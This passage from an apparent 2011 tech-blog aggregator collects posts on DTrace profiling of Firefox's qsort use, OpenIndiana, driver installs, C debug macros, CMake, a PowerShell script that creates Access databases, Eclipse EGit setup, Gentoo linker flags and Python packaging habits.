              libcairo.so.2.10800.10`_cairo_bentley_ottmann_tessellate_polygon+0x41f
              libcairo.so.2.10800.10`_cairo_path_fixed_fill_to_traps+0x150
              libcairo.so.2.10800.10`_cairo_clip_clip+0xe3
              libcairo.so.2.10800.10`_cairo_gstate_clip+0x44
              libcairo.so.2.10800.10`cairo_clip_preserve+0x31
              libxul.so`__1cKgfxContextEClip6M_v_+0x24
              libxul.so`__1cInsWindowNOnExposeEvent6MpnK_GtkWidget_pnP_GdkEventExpose__i_+0x56e
              libxul.so`__1cPexpose_event_cb6FpnK_GtkWidget_pnP_GdkEventExpose__i_+0x72
              libgtk-x11-2.0.so.0.2000.0`_gtk_marshal_BOOLEAN__BOXED+0x7b
              libgobject-2.0.so.0.2501.0`g_closure_invoke+0xdf
              libgobject-2.0.so.0.2501.0`signal_emit_unlocked_R+0x9f2
              libgobject-2.0.so.0.2501.0`g_signal_emit_valist+0x6d2
              libgobject-2.0.so.0.2501.0`g_signal_emit+0x28
              libgtk-x11-2.0.so.0.2000.0`gtk_widget_event_internal+0x24d
              libgtk-x11-2.0.so.0.2000.0`gtk_widget_send_expose+0x98
              libgtk-x11-2.0.so.0.2000.0`gtk_main_do_event+0x46f
              libgdk-x11-2.0.so.0.2000.0`_gdk_window_process_updates_recurse+0x291
              libgdk-x11-2.0.so.0.2000.0`_gdk_windowing_window_process_updates_recurse+0x24
              184

This counts the number of 4-byte element, 8-element arrays qsort aggregated on the stack trace. We get to use ustack() here because we are in userspace (stack() would give us the kernel stack trace). Where is Firefox in this mess? libxul.so. This is the limit of my knowledge of Firefox internals and someone more knowledgeable could tell you more.

Your Turn

Do you use DTrace? Do you have some interesting war stories? Let me know in the comments!

by JeffPC at October 02, 2011 04:49 PM

DTrace: qsort use in Firefox

I’ve talked about OpenIndiana a bunch. I’ve mentioned several of its features. Let me tell you about my Wikipedia article: DTrace experiments from today. Inspired by Wikipedia article: Con Kolivas, I decided to see how Firefox uses the qsort C function.

First things first, let’s look at what the function signature looks like.

void qsort(void *base, size_t nel, size_t width,
           int (*compar)(const void *, const void *));

The second argument contains the number of elements.

Now, let’s take a look at DTrace. We want the pid provider, which lets us instrument a specific process. In my case, Firefox was pid 1069. pid1069:libc:qsort:entry is the name of the probe that will fire every time qsort in libc.so is called by Firefox (pid 1069). Let’s aggregate the second argument (the number of elements). To keep things sane, I used the llquantize function. It is a log-linear quantization function that was rather well explained by http://dtrace.org/blogs/bmc/2011/02/08/llquantize/. (Base 10 with buckets between zero and one million seemed reasonable enough.) Additionally, I wanted DTrace to give me the current histogram every minute — that’s why there is the tick-60sec probe.

# dtrace -n 'pid1069:libc:qsort:entry{@=llquantize(arg1, 10,0,6,20)} tick-60sec{printa(@)}'

...
  1  78738                      :tick-60sec 

           value  ------------- Distribution ------------- count    
             < 1 |                                         2        
               1 |                                         0        
               2 |                                         21       
               3 |                                         2        
               4 |@@@@                                     365      
               5 |                                         1        
               6 |@                                        132      
               7 |                                         0        
               8 |@@@@@@@@@@@@@@@@@@@@@                    1923     
               9 |                                         0        
              10 |@                                        135      
              15 |@@                                       194      
              20 |@                                        134      
              25 |                                         9        
              30 |@@@                                      246      
              35 |                                         31       
              40 |                                         8        
              45 |                                         0        
              50 |                                         0        
              55 |                                         10       
              60 |                                         1        
              65 |                                         10       
              70 |                                         39       
              75 |                                         2        
              80 |@                                        112      
              85 |@                                        56       
              90 |@                                        82       
              95 |                                         1        
             100 |@                                        132      
             150 |@                                        90       
             200 |                                         0        
             250 |                                         0        
             300 |                                         4        
             350 |                                         0        

Interesting! After several minutes of browsing various websites, we can see that Firefox really likes to sort 8-element arrays. (The value column is the bucket for the various array lengths. The count column specifies how many times there was a qsort call for each bucket.) Let’s dig a little deeper. Sorting 1 byte array elements is very different from sorting 1 MB elements. It would be really nice if we could break the histogram down into several histograms — one for each size. Well, guess what? DTrace lets you do that very easily.

Note that the command changed only a little. Now, in addition to looking at the second argument (the array length), DTrace breaks down the distribution based on the value of the third argument (the array element size). Since I visited different websites and Firefox does caching, the distribution of qsorts is a bit different — but it is still close enough.

# dtrace -n 'pid1069:libc:qsort:entry{@[arg2]=llquantize(arg1, 10,0,6,20)} tick-60sec{printa(@)}'

...
  4  78738                      :tick-60sec 
               52
           value  ------------- Distribution ------------- count    
               1 |                                         0        
               2 |@@@@@@@@@@@@@@@@@                        60       
               3 |@@                                       9        
               4 |@@@@@                                    17       
               5 |                                         0        
               6 |@@@@@@@@@@@@@@@                          55       
               7 |                                         0        
               8 |@                                        3        
               9 |                                         1        
              10 |                                         0        

                8
           value  ------------- Distribution ------------- count    
             < 1 |@@@@@@@@@@@@@                            2        
               1 |                                         0        
               2 |                                         0        
               3 |                                         0        
               4 |                                         0        
               5 |                                         0        
               6 |                                         0        
               7 |                                         0        
               8 |                                         0        
               9 |                                         0        
              10 |                                         0        
              15 |                                         0        
              20 |                                         0        
              25 |                                         0        
              30 |                                         0        
              35 |                                         0        
              40 |                                         0        
              45 |                                         0        
              50 |                                         0        
              55 |                                         0        
              60 |                                         0        
              65 |                                         0        
              70 |                                         0        
              75 |                                         0        
              80 |                                         0        
              85 |                                         0        
              90 |                                         0        
              95 |                                         0        
             100 |                                         0        
             150 |                                         0        
             200 |@@@@@@@@@@@@@@@@@@@@                     3        
             250 |                                         0        
             300 |@@@@@@@                                  1        
             350 |                                         0        

                4
           value  ------------- Distribution ------------- count    
             < 1 |                                         12       
               1 |                                         0        
               2 |                                         1        
               3 |                                         0        
               4 |@@@@@@@                                  1351     
               5 |                                         0        
               6 |@                                        247      
               7 |                                         0        
               8 |@@@@@@@@@                                1868     
               9 |                                         0        
              10 |@@@                                      594      
              15 |@@                                       422      
              20 |@                                        230      
              25 |                                         4        
              30 |@@@@@@                                   1193     
              35 |@@                                       466      
              40 |                                         57       
              45 |                                         63       
              50 |                                         1        
              55 |                                         18       
              60 |@                                        190      
              65 |@@                                       341      
              70 |@                                        207      
              75 |                                         2        
              80 |                                         56       
              85 |@                                        158      
              90 |                                         46       
              95 |                                         0        
             100 |@@                                       350      
             150 |@                                        206      
             200 |                                         3        
             250 |                                         10       
             300 |                                         8        
             350 |                                         0        
             400 |                                         0        
             450 |                                         0        
             500 |                                         0        
             550 |                                         0        
             600 |                                         0        
             650 |                                         0        
             700 |                                         1        
             750 |                                         10       
             800 |                                         0        
             850 |                                         0        
             900 |                                         0        
             950 |                                         0        
            1000 |                                         0        
            1500 |                                         0        
            2000 |                                         0        
            2500 |                                         0        
            3000 |                                         8        
            3500 |                                         0        

As you can see, there are now three histograms printed — that’s because DTrace saw 3 unique values of arg2. The first histogram is for 52-byte array element sorts. There weren’t many of those over the few minutes of browsing I did. The second is for 8-bytes elements — there are six of those total! The third distribution is where things get interesting. These are all the sorts of 4-byte array elements. Now we know that the large amount of 8-element sorts Firefox performs are on 4-byte element arrays. I wonder what that’s about. We also see that there were eight times that Firefox ended up sorting an array that had somewhere between 3000 and 3500 4-byte elements. Eeek!

DTrace is a really powerful tool. It lets you inspect the operation of a system with minimal disruption (the performance overhead is rather small). I hope to post more analyses of various software in the future.

I should add, this experiment was conducted with Firefox 3.6.12 on OpenIndiana 151a.

by JeffPC at October 02, 2011 05:35 AM

September 30, 2011

Josef "Jeff" Sipek

Jasmine

It’s been a while since I used my camera. Yesterday evening, my girlfriend got her cat from home. I used the opportunity to take a few shots. As you may have guessed, her name (the cat’s) is Jasmine.

by JeffPC at September 30, 2011 01:25 AM

September 18, 2011

Josef "Jeff" Sipek

OpenIndiana: The What and Why

You have seen me publish two posts about OpenIndiana, but neither of them really says what it is and why you should use it.

The What

OpenIndiana started off as a fork of OpenSolaris. At first, its aim was to provide an alternative to Oracle’s soon-to-be-released Solaris 11, but lately its aim shifted to “an enterprise-quality OS alternative to Linux.”

OpenIndiana is much like a distro in the Linux world. It relies on the Illumos project for the kernel and basic userspace utilities (the shell, etc.). In September 2010, Illumos forked the OpenSolaris kernel and utilities, and OpenIndiana forked the surrounding userspace (the build system for all the packages that make the system usable).

The Why

It is the technology that is the reason I started using OI. Here are some of the features that either drew me in to try OI, or made me stay.

Crossbow
Crossbow was the name of the project that consisted of a major revamp of the network stack. With this revamp (which was available in OpenSolaris), you can create virtual network interfaces, vlans, bridges, switches (called etherstubs), as well as aggregate links with simple commands — quickly, and all the configuration is persistent. You can dedicate both physical and virtual links to zones (see below) to create entire network topologies within one computer. (see dladm(1M) and ipdam(1M))
Zones
These days, everyone is happily setting up virtual machines whenever they need an environment they can tweak without affecting stability of other services. Solaris zones are a great virtualization technology. They allow you to set up multiple Solaris instances (called zones) that have a separate root filesystem (much like chroot). Unlike chrooted environments, having root access in a zone does not give you unrestricted access to the kernel. Zones combined with crossbow is a great combination to consolidate separate systems onto a single Solaris host. (I am currently writing a post about using zones and crossbow on a home server/router.)
Boot Environments (BE) & IPS
Long story short, if the package manager (IPS) detects that a potentially major change is going to occur during an update (e.g., a driver or kernel upgrade), it clones the current root filesystem (easy to do thanks to ZFS) and applies the updates there. It then adds a menu entry to grub to boot into this new environment. The current environment is unchanged. At your leisure, you just reboot into the new environment. If everything works — great. If, however, things break, you can just reboot into the previous BE, and mount the new BE’s root and fix things up. This means that the only downtime the system sees is the reboot or two.
ZFS
There’s plenty of ZFS discussion elsewhere. My favorite features about it are (in no particular order): snapshots, deduplication, integrated volume management, and checksumming.

So there you have it. Sure, many of Solaris’s features are available in some shape or form on Linux, but they tend to be either horribly crippled, or if you are “lucky,” lacking sane management interface.

If you want to see what all this fuss is about, I suggest you grab the Live DVD (or Live USB) image on the download page and give it a try.

by JeffPC at September 18, 2011 03:48 PM

September 17, 2011

Josef "Jeff" Sipek

Meili

Back in June I got myself a new laptop — Thinkpad T520. As always, it’s a solid design (yes, I know, Thinkpads aren’t what they used to be). The unfortunate news is that the hardware was just a bit too new to be supported well. It came with Windows 7, which of course knew how to deal with all the devices in the system.

Debian

I tried installing Debian, but anything but the latest testing snapshot didn’t recognize my Intel 82579LM ethernet chip. The latest development snapshot installed just fine, but when I tried to boot into the installed system, everything got stuck in the middle of the initramfs. Booting with init=/bin/bash got me a shell, but anything and everything I tried didn’t fix the problem in the end. I searched the bug tracker for similar issues — no luck. In a last ditch effort, I tried to ask #debian. In has been my experience in the past that this channel is useless, but I asked anyway. I got precisely zero responses.

OpenIndiana

Unlike Debian, OpenIndiana installed and booted just fine. Sadly, both my wifi (Intel Wifi Link 1000) and my wired ethernet were not supported. I ended up installing VirtualBox in Windows and OpenIndiana underneath it. It worked reasonably well. At the same time, I started pestering some of the Illumos developers that mentioned that they were working on an update to the e1000g driver — the driver for my wired network interface.

Yesterday, one of them updated the bug related to the driver update with binaries for people to try. Well, guess what? I’m writing this entry in Vim over ssh.

The driver install was a simple matter of overwriting the existing e1000g files, and then running update_drv -a -i ’"pci8086,1502"’ e1000g and then rebooting. (I could have used devfsadm instead, but I wanted to make sure things would come up on boot anyway.)

I still need to switch Xorg to the proprietary NVidia driver.

Windows

I’m pretty sure I’ll end up rebooting into Windows every so often anyway…if only to play http://en.wikipedia.org/wiki/Age_of_Mythology. :)

P.S. In case you haven’t guessed it yet, Meili is my laptop’s hostname.

by JeffPC at September 17, 2011 05:39 PM

September 14, 2011

Josef "Jeff" Sipek

OpenIndiana (build 151a)

Over the past few months, I’ve played with Solaris — specifically, OpenIndiana, or OI for short. OI is a fork of OpenSolaris. OI’s first release happened on September 14, 2010. Today, exactly a year later, the OI community is proud to annouce the release of build 151a. The http://wiki.openindiana.org/oi/oi_151a+Release+Notes say it all.

Personally, I find the KVM port to Illumos (the project that forked the core libs, programs, and OpenSolaris kernel) the most interesting. It’ll let me run (and manage!) virtual machines a bit more easily than what I get with VirtualBox. (Since OI now uses Illumos as the core Solaris upstream, it benefits from all the great work done by companies and individuals that contribute to Illumos.)

In case you are a bit confused, OI aims to be the defacto community Solaris distribution.

Oh, I almost forgot… 151a includes a package with Guilt (developer/versioning/guilt). :)

by JeffPC at September 14, 2011 02:23 PM

September 08, 2011

Nate Berry

Quake II lives again!


I was rifling through my top desk drawer when I chanced to spy the CD case for an old copy of Quake II. My mind raced back to years ago when my brother and some friends would frag each other for hours in the dark on our makeshift home LAN yelling and laughing in Deathmatch [...]

by Nate at September 08, 2011 12:31 AM

September 04, 2011

Justin Lintz

Useful C Debug Macro

Tonight I took the plunge to get back into some more C coding. In getting my environment setup I came across a useful debugging macro. This macro will output the filename and line number every time it’s expanded. I wanted to make sure I understood how the macro was working before just copying and pasting it into my source code so I’ve broken it down below for myself and others to understand.

Here is a copy of the code that I slightly modified to also include the function name from where the debug macro is being used.

First we check if the DEBUG macro has been defined at all. If it has been, we declare a function-like _DEBUG macro that will get expanded to our debugging function. If DEBUG has not been defined, we still declare our function-like macro the same but with just no body so the macro will not be expanded to anything.

Our _DEBUG macro makes use of a few predefined macros:
__FILE__: Expands to the current file name. This will not print the shortname of the file.
__FUNCTION__: Expands to the current function the code is being executed from. This is a C99 and GCC feature only.
__LINE__: Expands to the current line number in the file

We also make use of ‘variadic macros’ aka macros that accept a variable number of arguments. A variadic macro can be defined named or unnamed. We use the named method which involves putting an argument name followed by ‘…’ which is later referenced by just using the argument name in the macro body. An unnamed variadic macro just involves using ‘…’ and later referenced in the macro body using the predefined macro __VA_ARGS__

A default format string is passed into printf to take care of the formatting for the filename, function name and line number. Immediately after the default format string, we specify the fmt argument we used that will get assigned our own format string that we pass into the _DEBUG macro. This will all get expanded to "%s:%s:%d: " "val of fmt" which is valid C syntax.

To activate the _DEBUG macro we can define DEBUG in our gcc command

gcc -g -D DEBUG

by justin at September 04, 2011 05:22 AM

August 29, 2011

Josef "Jeff" Sipek

CMake

Recently, I looked into various build system in hopes of finding one that sucks less than the custom built (not by me) one I had the “pleasure” of dealing with for about a month. The requirements were that it had to work on Windows, Linux, and Mac OS X. Of all the possibilities, CMake looked really promising. After successfully convincing the others that CMake was better for the project, most of the code got switched over. I have to say, CMake is nice.

Since then, I have replaced Makefiles in several of my projects (e.g., my blogging system) with CMakeLists.txt. Not only is the console output cleaner, but it does proper dependencies, some sanity checks, and in general simplifies one’s life. I am actually considering switching HVF build system to it.

by JeffPC at August 29, 2011 03:46 PM

Justin Dearing

Knowledge Quest: Reverse engineering unmanaged DLLs

As a programmer person, I am always learning. I learn different thing in different ways, at different rates, and for different purposes. Usually, I write these blog posts about things I have learned recently. This post is about what I am currently learning.

First, a little background. Around 2006 I was programming Windows CE devices, and syncing Pocket Access databases on them with a Microsoft Access database on a desktop via ActiveSync. Since I had no need for the Microsoft Access application, but I did need to be able to write SQL queries against the Access Database, I wrote PlaneDisaster.NET.

Recently, I realized that PlaneDisaster.NET did not work on 64 bit machines. The simple fix was to compile it as a 32 bit executable. However, I wanted to make it work as a 64 bit executable. This became doubly important when I realized that I could not use OPENROWSET() on a 64 bit instance of SQL server to connect to an Access database for the same reason that PlaneDisaster.NET would not work as a 64 bit process. Of course, doubly important was still not that important in the grand scheme of things.

Eventually, I did dust off PlaneDisaster.NET and got it to work as a 64 bit executable. Running PlaneDisaster.NET as a 64 bit process requires the 64 bit version of Microsoft Office 2010 or the Microsoft Access Database Engine 2010 Redistributable to be installed. However, even after doing this, I was unable to get two features of PlaneDisaster.NET to work., compacting and repairing Access databases.

PlaneDisaster.NET makes three calls to the unmanaged function SQLConfigDataSource(). These three calls pass the commands CREATE_DB, COMPACT_DB, and REPAIR_DB respectively to the JetSQL Engine. The first one works fine with  the 64 bit driver. However,  I cannot get the second two to work. I cannot find any documentation on these calls except one MSDN document last updated in 2001 which of course was written for the 32 bit driver.

So the question is, how do I plan on figuring out how to do this? My current plan involves using Nirsoft’s DLL Export Viewer to get the addresses of the dll entry points of the unmanaged calls I am making. I will then use these addresses to step through assembly in the Visual Studio Debugger. I have only toyed with assembly. I don’t know if I will succeed in this task. However, I have already learned a lot, and I will continue to learn more. I might end up solving this problem via an alternative solution. I might simply learn enough to better articulate a question on StackOverflow that gets an answer. Or,  I might find that I am able to successfully step through the assembly and figure out this problem that way.

I will keep you all updated.

by Justin at August 29, 2011 02:33 AM

August 25, 2011

Justin Dearing

Creating an Access Database In Powershell without Access installed

Recently I stumbled across a Hey, Scripting Guy! blog post titled “How Can I Use Windows PowerShell to Create an Office Access Database?” that demonstrated how to create a Microsoft Access database in powershell. The only problem with this script was it required Microsoft Access to be installed on the machine that it ran on. I knew this dependency on Access was unnecessary, because a few years ago I wrote an open source project for manipulating Microsoft Access and SQLite databases called PlaneDisaster.NET. That program did not require Microsoft Access to be installed and it allowed you to create, compact and repair databases. (I’ve discussed PlaneDisaster.NET previously on this blog.)

So, as a matter of personal and professional pride I determined that I must write a PowerShell script that could create an Access Database without requiring Microsoft Access to be installed. After all, If you can do something in C#, you can do it in PowerShell. I did have one concern. I was making unmanaged Win32 API calls via PInvoke. However, I quickly learned that’s not a problem at all. My particular PInvoke calls involve enums, but you can create enums in PowerShell. However, I ended up replacing the enums with ints in the PInvoke declarations and no one complained since PowerShell is good at figuring that sort of thing out. The code I ended up with is:

$signature = @'
[DllImport("ODBCCP32.DLL",CharSet=CharSet.Unicode, SetLastError=true)]
public static extern int SQLConfigDataSource
    (int hwndParent, int fRequest, string lpszDriver, string lpszAttributes);

[DllImport("odbccp32", CharSet=CharSet.Auto)]
public static extern int SQLInstallerError(int iError, ref int pfErrorCode, StringBuilder lpszErrorMsg, int cbErrorMsgMax, ref int pcbErrorMsg);
'@;

Add-Type -MemberDefinition $signature -Name Win32Utils -Namespace PInvoke -Using PInvoke,System.Text;

This created two static functions I could call, [PInvoke.WIn32Utils]::SQLConfigDataSource() and [PInvoke.WIn32Utils]::SQLInstallerError().

However, a new problem emerged. I could not get the script to run in a 64 bit PowerShell process. A quick google search informed me that the only way to get a 64 bit Access driver is through the Microsoft Access Database Engine 2010 Redistributable. However, even after installing the 64 bit version of that executable, my script did not work unless I ran it through a 32 bit instance of PowerShell.

After a lot of searching and frustration I eventually had an epiphany. The provider name I was using to create the database was Microsoft Access Driver (*.mdb). This provider name refered to ODBCJT32.DLL, which is only available as a 32 bit version. However, the driver that ships with the Access 2010 redistributable is called ACEODBC.DLL. This dll has a provider name of Microsoft Access Driver (*.mdb, *.accdb).  The code for this is simple:

[string] $driver = 'Microsoft Access Driver (*.mdb)';
if ([IntPtr]::Size -eq 8) {
    $driver = 'Microsoft Access Driver (*.mdb, *.accdb)';
}

Yes I’m using the size of a pointer to determine if I’m running in 32 or 64 bits.

The full script is below:

That version is hosted on poshcode.org to be more searchable. However, the authoritative one will remain as a github gist.

by Justin at August 25, 2011 11:42 AM

August 24, 2011

Wes

Installing and using egit, the eclipse git plugin

I use the latest PDT version of eclipse (Helios) as my IDE of choice, and have used the built-in cvs and add-on svn-kit plugins for version control for many years. When I first started using git, I guess I didn't think there was a git plug-in for eclipse or that the ones I saw just weren't stable enough, so I just went to the command line to do the git work then back to eclipse to continue coding. Now that Drupal has moved their whole repository from cvs to git, I thought it might be time to add the e-git plug-in to eclipse so that I don't have to leave eclipse to get git work done. That's the point of using and IDE isn't it?

First if you don't already have git installed on your laptop/desktop I suggest you follow the instructions for that at github, this link will redirect to the appropriate OS it detects that you are using.

To install e-git, go to preferences, in linux it's in the Window menu, in Mac OSx it's in the File, I think it's the same as the Mac for Windows. In preferences go to Install/Update -> Available Software Sites. If Eclipse Git Team Provider is not listed then you have to click on add and enter http://download.eclipse.org/egit/updates as the site for egit, If it is listed, just enable it. Next, go to Help -> Install New Software. In the "Work with" drop down select "Eclipse Git Team Provider", then check Eclipse JGit under JGit and Eclipse EGit under Eclipse Git Team Provider, click next and accept the license agreement and you'll be prompted to restart eclipse when you're finished. If all goes well, you should see a new tab under Team in the preferences window for Git. Since I'm a php web developer, I've set my Default Repo folder to /var/www here. Then click on Configuration and add 2 new key/value pair entries, the first is user.name (put what you'd like here but I think it should be your true name), and the second is user.email (use the name you've used/will use with the repos you are going to be an active participant of). These 2 values are used along with your public key to make sure you're you when you want to push to the repo of origin.

Now comes the trickiest part of the eclipse/git integration. I tried to create a php project then outside of eclipse do a git init but noticed that in eclipse the team menu only had "apply patch", so that wasn't the way to add git integration. I tried a couple of other things but nothing gave me what I needed.
The process I use for creating a new php project with git integration now is, open the Git Repos view, click on Add Git Repo, add a new repo here with an absolute path such as /var/www/new-repo and click finish. Next, right click on the new repo in the view and select "import projects". Under Method for project creation select "Use the New Projects wizard" and under "Method for sharing projects after project creation" select "Try to share newly created projects automatically" and click finish. Now the New Project wizard will start, expand PHP to reveal PHP Project, select that and click next. In the new php project under Project name type new-repo or whatever you just named the repo you just created, check the box for javascript support if you like and click on finish. The first time you do this you'll get another dialog that asks if you'd like to open the Associated perspective (php) now, you can check "remember my decision" and you won't ever have to deal with this again, click yes, and you'll have started a fully git integrated php project in eclipse. Expand the newly created project and highlight the .settings, .buildpath, and .project files and right click on them, select Team->Ignore so that these files and directory won't be committed to any other repo. You'll see a new file (created by git) .gitignore which keeps track of these things.

http://wiki.eclipse.org/EGit/User_Guide

Topics: 

by lipcpro at August 24, 2011 03:54 PM

August 20, 2011

Nate Berry

Google Earth in Ubuntu 11.04


Installing Google Earth in Ubuntu 11.04 turned out to be as easy as downloading the latest version from here and double-clicking it, but not until I had already tried to download the source and build an install package manually. I’m not sure how this would have worked, but I gave up when Ubuntu barked that [...]

by Nate at August 20, 2011 12:48 AM

August 19, 2011

Justin Dearing

The cost of fixing a computer, and Open Source Software

Note: I started writing this a while ago, but just finished it. This is made obvious by the time stamps of the tweets I reference.

Twitter is a great tool, but sometimes you need more than a 140 characters for a reply. This is one of those cases.

It all started with a retweet by Karen Lopez, a.k.a. @datachick:

@jlopez255: Starting today -”Name your own price computer repair”, U name the price for my labor and I will fix your computer. Parts extra.

Which lead to me putting forth the following propositions to Karen and Jennifer:

  1. It’s a problem that is is cheaper to buy a new computer than repair it for low end computers under 3 years old.
  2. We need to make repairing computers cheaper, because many individuals cannot afford what professionals rightfully charge for their skill level.
  3. OSS is better suited than closed course for bringing down the cost of computer repair.
  4. You can petition the Lord with prayer.
On point one I was preaching to the choir. On point number two I received no direct response. However, for number 3 Karen responded:
@zippy1981@jlopez255 I have not had great ease of use with OSS. For every great 1, there are 10 that require lots of Dev / tech skills.
I don’t refute this statement at face value, However, I do have the following commentary to offer backing up my third proposition.
First of all, lets limit the scope to the average personal machine owned by joe sixpack. Microsoft Office, or Open Office (or Libre Office) are power tools for these people. Other than an Office Suite, we are really talking about the web browser, and maybe the email client. For these users, a default Ubuntu install is more than enough. Most of their stuff is done on the web. Open/Libre Office are a little lacking in UX and features, but google docs makes up for the UX. Also, most of these users don’t want or need the missing features. In terms of web browsers and a window manager, the web browsers are exactly the same (yes I trained both my parents to use firefox), and the Ubuntu GUI is on par Windows 7 in terms of polish, with some interesting innovations such as how it handles full screen windows. Also, for netbooks, Ubuntu has a special install disc that tweaks the UI for the small screen.
Secondly, with Ubuntu, Linux is truly for end users. Rarely does something not work. When it fails to work, you might have to bust out the command line, but the procedures are no more complicated than what one would have to do on windows. Quite frankly, if you want a *nix OS that requires you to do a lot manually, try a BSD or Solaris.
Third, my point was OSS is better suited for reimaging hard drives cheaply than windows. Because OSS is free as in beer for all practical purposes, there are no licensing restrictions to enforce. Therefore, there are no restrictions on creative ways of deploying Linux automatically. Windows Deployment Services (WDS) and its predecessor Remote Installation Services (RIS) are expensive, and designed for enterprise deployment. Microsoft could develop a version of these aimed at mom and pop geeksquad equivalents. If such a program allowed you to entered license keys for windows, office, etc and it install fully patched versions of the licensed software, plus whatever third party stuff they wanted to add (and their was a gallery where you could pick third party free and paid software to install), that might compete with what can be achieved when your software is free as in freedom and beer. However, I honestly don’t see Microsoft doing this until someone does this with Linux first.
So my point was that OSS has better potential for automating PC repair compared to Windows. You can simplify the process with OSS which will allow less skilled people to perform PC repaired. These less skilled people will command lower fees.

by Justin at August 19, 2011 11:04 AM

August 14, 2011

Justin Dearing

Yak Shaving Digest 2011-08-13

This blog post is inspired by Brendan W McAdams (blog | twitter) for introducing me to the term yak shaving, Aaron Bertrand (blog | twitter) for his Connect Digests and Jennifer Lopez (not that one) (website | twitter) for expressing  her desire to see the intersect of who she follows on twitter and who follows her, which thereby made me want to do the same thing.

I was working on a C# console app the past week or so that would find the intersect of my following and followed by list on twitter. This Saturday was dedicated to getting it suitable for github, which it now is. However, I encountered several issues along the way. Because I had some blocking issues, I allowed myself to be distracted  by every minor issue  I encountered with the libraries and tools I was using for the task, for a brief period of time. The purpose of this was to report the issues, and if possible resolve them. This lead to bug reports, feature requests, and two patches. I listed them all here to add some context to all of them.

  • OAuth issues: This actually occurred earlier in the week. Twitter uses OAuth v1, which I discovered isn’t really suited for desktop apps because you have to share the secret that associates a request with your app with the world. That’s the equivalent of being required to share a pgp private key with the world. My workaround is to simple make users of my app generate their own app key (annoying, but something you’d probably be willing to do to get CLI access to twitter). If the app becomes popular I will request xAuth access for my application.
  • Sensitive info in config files and version control. This is related to the first issue. This app was not even stored in a local git repo despite me being a SCM nazi because I needed to figure out a strategy that would allow me to push an empty app.config to github. I store my consumer key/secret in the app.config, which I point out above I don’t want to share with anyone. I solved this problem by not checking the config file into version control and having a sanitized one with a different name in version control. Also, I used configSource so all my OAuth things would be in a separate config file from the main one.
  • Being anal retentive about KBCsv overloads. I am a huge fan of Kent Boogaart‘s CSV library. In my console app, I wanted to output the results as a CSV, so I could sort the data with excel.  However, along the way I got the crazy idea  to change some constructor parameters from string[] toIEnumerable<string>. I discovered this could lead to ambiguous overloads . However, I did submit a fully working patch for IList<string> and WIP for the IEnumerable<string> with some commentary and asking if it made sense to complete the work. See patch 101185 and 101186 in the KBCsv patchlist for the actual code. I’ll call this a partial victory.
  • Filing a feature request with HelperTrinity. HelperTrinity is Ken Boogaart’s general helper library, used by KBCsv. While hacking on the KBCsv source I thought, “Hey! This could use some more helper and extension methods.” So I submitted a feature request.
  • Finding  a bug in ReSharper. Digging through the KBCsv source code lead me to find an edge case that could lead to resharper reporting a false error. So I opened RSRP-274868.
  • Filed two codeplex feature requests. I went total meta and made two suggestions for codeplex itself. Both are the sort of simple things that I expect will be received by the codeples staff with either a “great idea” or “no thats so terrible for this reason”
  • MongoDB feature requests. I constantly find the BSON implementation in the MongDB C# driver useful outside of mongodb. It was useful here, but the time it saved me was eaten up filing two feature requests. I hope to implement patches for both of them.
  • Finally, one of my twitter calls broke. Twitterizer is the library I am using for twitter, and in the middle of debugging a call that always worked stopped working. Looking elsewhere on the forums shows this is not a problem unique to me. This is the event that convinced me that my time would be better spent shaving the yak. In the end, this is still an open issue, but reverting to an older version of the library in a different branch, and excessive use of git cherry-pick made it work.
  • Epilogue: The app works, but LibreOffice does not correctly import all rows in the spreadsheet. Since its all the import columns occur before the problems occur, and this can be cleaned in a text editor, I will investigate and file the bugs appropiatly with KBCsv and LibreOffice appropriately. Also, I need to get access to a machine with Excel installed. I expect Excel to be better at parsing CSV.  It seems that I was specifying space as a delimiter in the CVS import dialog. Once I unchecked that the CSV imported properly.

So in conclusion, my app works mostly, and between my bug reports and patches, I hope that the libraries and ReSharper will be improved. Also, by writing this blog post, I hope that having the big picture will be useful to myself as I polish of this twitter utility, and implement fixes for some of the bugs.

by Justin at August 14, 2011 01:23 PM

July 27, 2011

Josef "Jeff" Sipek

Gentoo's --as-needed insanity

I feel a bit ranty.

Recently, I got to make an ebuild file (this is Gentoo’s equivalent of RPM spec file) for PCP. The ebuild file is pretty simple to make — the only trickiness was PCP’s little strange makefile setup (the makefile runs configure which makes another makefile that the original makefile includes). This was pretty easy to work with anyway.

The issue I spent about a day and a half on was Gentoo’s idea of making better executables … the –as-needed flag. The idea behind this flag is to only link in the libraries that are actually needed (have symbols referenced) and ignore the rest. This sounds great at first, but then you run into an issue where you want to build a Perl module but instead you end up with a shared object which Perl won’t load because of unresolved references. I don’t know how exacly Perl does its magic, but –as-needed was not linking the Perl module against libpcp.

Part of the fix was to add a bunch of filters in the pkg_setup hook:

        append-flags $(no-as-needed)
        filter-flags -Wl,--as-needed
        filter-ldflags -Wl,--as-needed
        filter-ldflags --as-needed
        append-ldflags $(no-as-needed)

Additionally, I had to modify a src/cpan/PMDA/Makefile.PL to disable this insanity in the Perl-invoked builds.

by JeffPC at July 27, 2011 03:25 PM

July 13, 2011

Justin

How not to program in python

TL;DR

Whatever you do, make sure you are using versioned python packages, even for simple tasks. And use pip+virtualenv.

So you want to program in python..

It seems like only yesterday, and not 7 years ago, that I decided to learn python. I may not be the best python programmer, but I have made probably every mistake you can, so here are a bunch of things not to do, and a few things you should be doing.

Don't: write python 'scripts'

Don't write programs like this:

temp = input("C: ")
print temp*9/5+32

The way you fix that is not by writing the following:

if __name__ == "__main__":
    temp = input("C: ")
    print temp*9/5+32

And don't write this either:

def main():
    temp = input("C: ")
    print temp*9/5+32
if __name__ == "__main__":
    main()

No matter how good your logic is, if you couple the logic with your input and output you are painting yourself into a corner. I've seen people write scripts like this, and then have other scripts call them using os.system. In a loop. Then they wonder why python is so slow.

Do: Write python modules and packages

Minimally this could look something like:

def ctof(temp):
    return temp*9/5+32
def main():
    temp = input("C: ")
    print ctof(temp)
if __name__ == "__main__":
    main()

Even better would be to have main parse sys.argv rather than working interactively. For simple interactive tools it is hard to beat the cmd module

Now you have a (albeit poorly named) python module that can properly be imported from a larger program:

>>> import temp
>>> print temp.ctof(100)
212

Don't: mess with PYTHONPATH

Now that you have a module you can import, what do you do with it? For years my development/production environment consisted of the following: a lib directory containing modules and packages and a util directory containing scripts that used those modules. This worked fine for a long time, especially when I only had one machine. When I got more systems, I used the high tech method of rsync'ing the entire directory tree to /srv/python or ~/python/ and mucking with the python path. This system worked, but had a number of problems:

  • If I wanted to run a program on a new system, I had to rsync the entire directory tree.
